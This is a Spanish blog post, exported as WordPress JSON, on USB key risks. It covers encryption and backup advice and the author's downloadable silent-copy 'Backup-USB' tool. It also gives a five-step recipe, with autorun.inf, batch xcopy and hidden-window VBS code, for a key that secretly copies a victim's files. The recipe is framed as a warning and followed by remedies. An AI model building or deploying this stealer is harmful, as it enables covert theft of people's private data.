{"id":1354,"date":"2016-12-16T19:17:12","date_gmt":"2016-12-16T18:17:12","guid":{"rendered":"http:\/\/www.palentino.es\/blog\/?p=1354"},"modified":"2017-03-17T11:40:51","modified_gmt":"2017-03-17T10:40:51","slug":"lo-que-el-usb-esconde-alerta-usuario-acciones-peligros-y-aplicaciones","status":"publish","type":"post","link":"https:\/\/www.palentino.es\/blog\/lo-que-el-usb-esconde-alerta-usuario-acciones-peligros-y-aplicaciones\/","title":{"rendered":"Lo que el USB esconde. Alerta usuario. Acciones, peligros y aplicaciones."},"content":{"rendered":"

Buenas de nuevo. \u00a0\ud83d\ude09<\/span><\/p>\n

Hace tiempo que deseaba escribir este POST. En \u00e9l os mostrar\u00e9 una serie de cuestiones que me preocupan, relacionadas con los dispositivos USB. Como\u00a0pod\u00e9is\u00a0apreciar, en la imagen destacada de este art\u00edculo, se metaforiza este concepto … <\/span><\/p>\n

Los USBs pueden ser como Aliens<\/a>, infectan, atacan y pueden camuflar algo en su interior. A su vez pueden ser tan vulnerables como su progenie, siendo susceptibles al robo, fuego y p\u00e9rdida.<\/span><\/p>\n

El uso de pendrives, llaves USB o memorias se encuentra muy extendido actualmente. Infinidad de usuarios intercambian, copian, prestan o ceden sus llaves. Pero, realmente, \u00bf\u00a0somos conscientes<\/strong> de los peligros<\/strong> a los que nos enfrentamos?, \u00bfaplicamos y tomamos medidas de seguridad adecuadas ?, \u00bf Ciframos los datos ? \u00bf Nos percatamos de los problemas existentes derivados de la p\u00e9rdida o el robo ?.<\/p>\n

Actualmente existen algunas utilidades para proteger los archivos de estas unidades mediante cifrado o password, pero el porcentaje de uso, conocimiento y aplicaci\u00f3n es relativamente bajo. Personalmente recomiendo\u00a0encarecidamente\u00a0emplear mecanismos de cifrado.<\/p>\n

Adem\u00e1s, sumados a estos riesgos, las aplicaciones da\u00f1inas que roban \u00a0o extraen \u00a0datos sin consentimiento, que\u00a0pululan por la red, evidencian la necesidad de estar muy atentos. Toda la responsabilidad de estas acciones,\u00a0evidentemente,\u00a0reside en los usuarios que las efect\u00faan<\/strong>, que\u00a0sin previo aviso<\/strong>, \u00a0roban los datos del que presta la llave o el ordenador.<\/p>\n

Por ende las copias de seguridad no se efect\u00faan\u00a0con la suficiente frecuencia o antelaci\u00f3n, y sumado al alto porcentaje de fallo de estos dispositivos,\u00a0expulsiones\u00a0incorrectas, fallo circuitos,\u00a0ca\u00eddas, humedad, \u00a0etc\u00e9tera, \u00a0los datos corren un grave riesgo de p\u00e9rdida …<\/p>\n

\u00bf Estamos dispuestos a asumirlos ?<\/p>\n

En este post veremos casos pr\u00e1cticos, alguna utilidad de cifrado, backup de informaci\u00f3n, adem\u00e1s del mecanismo que emplean algunos usuarios malintencionados para extraer informaci\u00f3n del ordenador donde conectan las llaves.<\/p>\n

Adem\u00e1s os dejar\u00e9 un enlace a una utilidad que desarroll\u00e9 en su momento, para poder realizar copias de seguridad automatizadas de mis datos.<\/strong> Este programa empleado de forma malintencionada e il\u00edcita, puede provocar fugas de informaci\u00f3n cuando conectamos una llave USB al ordenador del infractor con clara intenci\u00f3n<\/strong> de robar informaci\u00f3n, que, sin previo aviso, \u00a0sin consentimiento y sin nosotros percatarnos, clone nuestra llave en su PC. Del backup al robo, todo ello, motivado por la intencionalidad del usuario que lo emplea.<\/p>\n

\u00a0Comencemos, paso a paso …<\/p>\n

<\/p>\n

Lo primero que os recomiendo es siempre crear una copia de seguridad de los datos de la USB. Para ello, disponemos de 2 formas. Una manual y la otra automatizada con alguna aplicaci\u00f3n. L\u00f3gicamente la manual depende de cada usuario, pero casi siempre se nos olvida.<\/p>\n

Como estrella del post, os proporciono esta utilidad que \u00a0considero tremenda, no existiendo muchas en Internet. La desarroll\u00e9 de forma sencilla para realizar mis copias de seguridad automatizadas.
\nBackup-USB<\/strong>.<\/p>\n

Esta aplicaci\u00f3n crea una copia de todos los datos de la llave USB, en el disco duro del PC, a la que lo conectemos. Lo hace realmente r\u00e1pido puesto que esta desarrollada llamando a la API nativa C++. Funciona en windows 10, 8, 7, vista y Xp.<\/p>\n

\"\"<\/a>

Backup USB windows 7, soporta 32 y 64, Vista, Xp<\/p><\/div>\n

Enlace de descarga del fichero comprimido .rar. El programa no requiere instalaci\u00f3n. Por favor consultar el leeme.txt incluido.
\n<\/strong><\/span><\/p>\n

USB-Backup
\n<\/a>
\n<\/strong>Observaciones: he analizado la herramienta con software antivirus AVG, Avast y Malwarebytes, Spyware y no detecta nada.\u00a0<\/span><\/p>\n

Backup-USB deposita los datos en la unidad C:\\ y crea una carpeta con la copia de la USB conectada llama\u00a0Copia-USB-backup<\/strong>, tal y como describo en la ayuda.<\/p>\n

Posee dos modos, Backup inmediato, donde el proceso se realiza instant\u00e1neamente y el m\u00e9todo temporizado.<\/p>\n

El proceso temporizado<\/strong> oculta el programa, para no molestar \u00a0cuando trabajamos con el PC (yo lo cargaba al inicio del sistema), y comprueba cada 10 segundos la existencia de nuevas llaves USB conectadas. Si es as\u00ed, copia el contenido y reemplaza los archivos anteriores sin confirmar y de forma transparente.<\/p>\n

Lo \u00fanico que queda visible es un proceso tal y como se muestra en el administrador de tareas de XP y Windows 7.<\/p>\n

\"\"<\/a>

Ventana de procesos en XP<\/p><\/div>\n

\"Ventana<\/a>

Ventana de procesos en Windows 7 de backup-usb<\/p><\/div>\n

 <\/p>\n

Una vez realizada la copia automatizada el proceso se cierra solo.<\/p>\n

Ahora viene la parte a considerar y peligrosa.\u00a0<\/strong>Esta aplicaci\u00f3n en malas manos o usuarios malintencionados, puede provocar, \u00a0lo que te imaginas. Puede ser un arma de doble filo. Si conectamos nuestra USB en el PC del usuario que ejecuta la aplicaci\u00f3n, copiar\u00e1 el contenido de nuestra llave sin darnos cuenta, en el disco duro del PC del usuario. Evidentemente el usuario es consciente de ello, tiene la obligaci\u00f3n de avisarnos de esta acci\u00f3n, y desactivar la aplicaci\u00f3n, matando el proceso, antes de conectarla.<\/p>\n

\"\"<\/a><\/p>\n

 <\/p>\n

Con esto os pretendo mostrar, que debemos tener mucho, pero mucho cuidado al conectar las llaves a ordenadores de los cuales no sabemos su identidad o desconfiamos. Por otro lado, lanzo el mensaje de alerta sobre la necesidad de cifrar la informaci\u00f3n del Pendrive. Con ello toda acci\u00f3n de copia se invalida. Repito, es algo que debe realizarse por todo el mundo, cifrar y proteger las llaves, por favor.<\/p>\n

Pero no queda ah\u00ed la cosa. El ordenador donde conectamos la llave puede poseer virus<\/strong>, y aunque cifremos los datos, se puede infectar la llave, si no se dispone de una soluci\u00f3n antivirus adecuada y actualizada que nos supervise el equipo. Recomiendo el Mxone<\/a> que es espec\u00edfico para llaves y gratuito.<\/p>\n

Otra combinaci\u00f3n posible es que\u00a0protejamos\u00a0la llave contra escritura, algunos fabricantes lo incorporan a nivel hardware con un conmutador, pero ello no evita que se lea y se termine filtrando informaci\u00f3n de\u00a0car\u00e1cter\u00a0personal y privada en el Ordenador. Esto es un delito, insisto de nuevo en ello. Y es necesario saberlo.<\/p>\n

El automatizador de Mac puede realizar tareas similares. De hecho tengo automatizada una tarea, tan solo conectar un USB o el iphone, descarga las fotos. Entre otras cosas.<\/p>\n

\"Automatizador\"<\/a><\/p>\n


\nAl margen de todo lo explicado, existe otro aspecto de extrema importancia. Que\u00a0deb\u00e9is\u00a0descubrir para evitar posibles da\u00f1os.<\/strong><\/p>\n

Es el proceso inverso<\/strong>, es decir, conectar una llave USB que nos robe informaci\u00f3n del ordenador.<\/p>\n

En la red existen m\u00faltiples scripts, pero el m\u00e1s empleado siempre es gracias a la ejecuci\u00f3n del autorun.inf.\u00a0<\/strong>Por defecto, este archivo se encuentra en el raiz del USB, y es el mecanismo de ejecuci\u00f3n autom\u00e1tica al insertar la unidad, como el de los CDs \u00f3 DVDs.<\/p>\n

Veamos los pasos que puede seguir el sujeto. Con 5 acciones crea un USB que copia nuestros datos del disco duro al USB sin darnos cuenta<\/strong>. \u00bf Debemos cifrar el disco :-)?<\/p>\n

Primer paso<\/strong>. \u00a0El usuario da\u00f1ino crea un archivo con el bloc de notas (notepad.exe) . Y a\u00f1ade el siguiente c\u00f3digo.<\/p>\n

[autorun]<\/span>
\n icon=drive.ico<\/span>
\n open=lanzador.bat<\/span>
\n action=Clic para ejecutar<\/span>
\n shell\\open\\command=lanzador.bat<\/span><\/p>\n

Almacenar\u00e1 estas instrucciones en un archivo autorun.inf<\/strong> en la pendrive. El icono es opcional.<\/p>\n

Segundo paso:<\/strong> El sujeto crea un archivo .bat con las siguientes instrucciones. Esto lo puede realizar con el notepad.<\/p>\n

@echo off<\/span><\/p>\n

:: variables<\/span><\/p>\n

\/min<\/span>
\n SET odrive=%odrive:~0,2%<\/span>
\n set backupcmd=xcopy \/s \/c \/d \/e \/h \/i \/r \/y<\/span>
\n echo off<\/span>
\n %backupcmd% “%USERPROFILE%\\Mis imagenes” “%drive%\\robo\\Mis imagenes”<\/span>
\n %backupcmd% “%USERPROFILE%\\Favoritos” “%drive%\\robo\\Favoritos”<\/span>
\n %backupcmd% “%USERPROFILE%\\videos” “%drive%\\robo\\videos”<\/span>
\n @echo off<\/span>
\n cls<\/span><\/div>\n
<\/div>\n
El nombre dado es fichero.bat<\/strong><\/div>\n
<\/div>\n
<\/div>\n
Tercer paso:<\/strong> Abrir\u00e1 otro notepad e incluir\u00e1:<\/div>\n
<\/div>\n
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False<\/span><\/div>\n
<\/div>\n
Lo almacenar\u00e1 como\u00a0invisible.vbs <\/strong>u otro nombre.<\/div>\n
<\/div>\n
\n

 <\/p>\n

Cuarto paso:<\/p>\n<\/div>\n

Crear\u00e1 otro notepad (bloc de notas) con la siguiente instrucci\u00f3n.<\/div>\n
<\/div>\n
wscript.exe \\invisible.vbs fichero.bat<\/span><\/div>\n
<\/div>\n
y lo llamar\u00e1 lanzador.bat<\/strong><\/div>\n
<\/div>\n
Este archivo por lotes hace 2 cosas, busca el fichero invisible.vbs en el raiz \u00a0de \u00a0la llave USB y lo carga junto con fichero.bat<\/div>\n
<\/div>\n

\nQuinto Paso<\/strong>:<\/div>\n
\n

El infractor, copia los 4 ficheros creados en los pasos anteriores y los deposita en el raiz de la unidad USB, incluido el icono, si lo cree oportuno. Tambi\u00e9n crear\u00e1 una carpeta llamada “robo” donde se depositar\u00e1n los ficheros copiados autom\u00e1ticamente.<\/p>\n

Esto es todo,\u00a0incre\u00edble\u00a0pero cierto. El atacante probar\u00e1 la llave primero en su ordenador antes que, en el de la v\u00edctima. Es un cobaya de su propio experimento.<\/p>\n

Os adelanto, que estoy luchando contra esto, para crear un programa residente que comprueba las unidades y la presencia de estos archivos. Espero disponer de \u00e9l pronto.<\/p>\n


\nRemedios<\/strong><\/p>\n

USB Safeguard<\/a>, (espero que me patrocinen al menos \ud83d\ude09 ), aplicaci\u00f3n portable, es decir, no necesitamos instalarla en el equipo sino que se ejecuta sobre la memoria USB. Funciona en sistemas Windows desde 2000 hasta 7. La versi\u00f3n gratuita tiene una restricci\u00f3n de tama\u00f1o en la unidad que se puede instalar de 2 GB, si queremos tener unidades o particiones de mayor tama\u00f1o cifradas tenemos que pasar a la versi\u00f3n de pago que cuesta 10 euros.<\/p>\n

USB Security<\/a>.\u00a0Cifra y protege con contrase\u00f1a unidades USB.<\/p>\n

USB Disk Security<\/a>. Es una utilidad que protege el PC local de infecciones procedentes de memorias USB. Instala un protector residente en el PC que activa un an\u00e1lisis cada vez que se conecta un dispositivo USB. Tambi\u00e9n ofrece USBscan, un an\u00e1lisis bajo demanda de unidades USB, repara el Registro y permite eliminar aplicaciones.<\/p>\n

Es importante recalcar que algunos fabricantes de USB incorporan estas utilidades en el raiz de la llave una vez comprada.\u00a0“Un poquito de por favor”, no\u00a0borr\u00e9is\u00a0estas utilidades, aprended como funcionan, \u00a0que valen para algo \ud83d\ude09<\/p>\n

El propio sistema operativo, en en determinadas versiones tiene la capacidad de cifrar carpetas y contenidos.\u00a0Windows 7 permite que protejamos nuestras memorias USB mediante cifrado de forma c\u00f3moda gracias a BitLocker, una herramienta que encontramos en las versiones Ultimate y Enterprise<\/strong> de Microsoft Windows Vista\/7.<\/p>\n

Con la memoria USB conectada al PC, pulsa Inicio\/Equipo. En la siguiente ventana, haz clic con el bot\u00f3n izquierdo del rat\u00f3n sobre la unidad Flash USB y selecciona Activar BitLocker.<\/p>\n

Espero que esta informaci\u00f3n os haga reflexionar, protegeros y actuar. Existe mucho alien suelto …<\/p>\n

No existe peor mentira, que la de ocultar la verdad.<\/strong><\/p>\n

 <\/p>\n

Contenido \u00fanico – puedes verificarlo en:\u00a0http:\/\/www.plagspotter.com\/<\/a><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"

Buenas de nuevo. \u00a0\ud83d\ude09 Hace tiempo que deseaba escribir este POST. En \u00e9l os mostrar\u00e9 una serie de cuestiones que me preocupan, relacionadas con los dispositivos USB. Como\u00a0pod\u00e9is\u00a0apreciar, en la imagen destacada de este art\u00edculo, se metaforiza este concepto … Los USBs pueden ser como Aliens, infectan, atacan y pueden camuflar algo en su interior. A su vez pueden ser tan vulnerables como su progenie, siendo susceptibles al robo, fuego y p\u00e9rdida. El uso de pendrives, llaves USB o memorias se encuentra muy extendido actualmente. Infinidad de usuarios intercambian, copian, prestan o ceden sus llaves. Pero, realmente, \u00bf\u00a0somos conscientes de los peligros a los que nos enfrentamos?, \u00bfaplicamos y tomamos medidas de seguridad adecuadas ?, \u00bf Ciframos los datos ? \u00bf Nos percatamos de los problemas existentes derivados de la p\u00e9rdida o el robo ?. Actualmente existen algunas utilidades para proteger los archivos de estas unidades mediante cifrado o password, pero el porcentaje de uso, conocimiento y aplicaci\u00f3n es relativamente bajo. Personalmente recomiendo\u00a0encarecidamente\u00a0emplear mecanismos de cifrado. Adem\u00e1s, sumados a estos riesgos, las aplicaciones da\u00f1inas que roban \u00a0o extraen \u00a0datos sin consentimiento, que\u00a0pululan por la red, evidencian la necesidad de estar muy atentos. Toda la responsabilidad de estas acciones,\u00a0evidentemente,\u00a0reside en los usuarios que las efect\u00faan, que\u00a0sin previo aviso, \u00a0roban los datos del que presta la llave o el ordenador. Por ende las copias de seguridad no se efect\u00faan\u00a0con la suficiente frecuencia o antelaci\u00f3n, y sumado al alto porcentaje de fallo de estos dispositivos,\u00a0expulsiones\u00a0incorrectas, fallo circuitos,\u00a0ca\u00eddas, humedad, \u00a0etc\u00e9tera, \u00a0los datos corren un grave riesgo de p\u00e9rdida … \u00bf Estamos dispuestos a asumirlos ? En este post veremos casos pr\u00e1cticos, alguna utilidad de cifrado, backup de informaci\u00f3n, adem\u00e1s del mecanismo que emplean algunos usuarios malintencionados para extraer informaci\u00f3n del ordenador donde conectan las llaves. Adem\u00e1s os dejar\u00e9 un enlace a una utilidad que<\/p>\n

(M\u00e1s)\u2026<\/a><\/p>\n","protected":false},"author":1,"featured_media":1356,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[32,50,7,14],"tags":[151,673,153,152,668,150],"class_list":["post-1354","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-formacion","category-seguridad","category-software","category-varios","tag-backup-usb","tag-informatica","tag-peligros","tag-pendrive","tag-seguridad","tag-usb"],"_links":{"self":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/1354","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/comments?post=1354"}],"version-history":[{"count":90,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/1354\/revisions"}],"predecessor-version":[{"id":9472,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/posts\/1354\/revisions\/9472"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/media\/1356"}],"wp:attachment":[{"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/media?parent=1354"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/categories?post=1354"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palentino.es\/blog\/wp-json\/wp\/v2\/tags?post=1354"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}